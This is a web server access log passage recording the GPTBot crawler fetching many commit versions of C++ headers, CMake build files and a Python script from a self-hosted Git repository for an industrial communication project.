200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14175] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:46:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11162] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:46:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:46:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11183] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14180] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:47:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11185] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11185] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14174] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:47:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11189] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:47:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11162] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11062] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11058] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp?display=rendered" [Client 74.7.227.38] [Length 11086] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/cpp/include/transport_error.hpp" +[17/Feb/2026:17:47:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11088] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11036] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:47:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=source" [Client 74.7.227.38] [Length 14174] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11164] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:47:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11184] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:47:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=source" [Client 74.7.227.38] [Length 11167] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/cpp/include/transport_state.hpp" +[17/Feb/2026:17:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/cpp/include/modbus_exception.hpp" +[17/Feb/2026:17:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache?display=source" [Client 74.7.227.38] [Length 11185] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11420] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" +[17/Feb/2026:17:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/PythonTest/import%20sys.py" +[17/Feb/2026:17:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/import%20sys.py" +[17/Feb/2026:17:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/PythonTest/import%20sys.py" +[17/Feb/2026:17:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11421] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/import%20sys.py" +[17/Feb/2026:17:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" +[17/Feb/2026:17:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11421] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" +[17/Feb/2026:17:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/PythonTest/import%20sys.py" +[17/Feb/2026:17:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11419] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PythonTest/import%20sys.py" +[17/Feb/2026:17:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11420] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/import%20sys.py" +[17/Feb/2026:17:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PythonTest/import%20sys.py" +[17/Feb/2026:17:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/PythonTest/import%20sys.py" +[17/Feb/2026:17:47:22 +0000] - 200 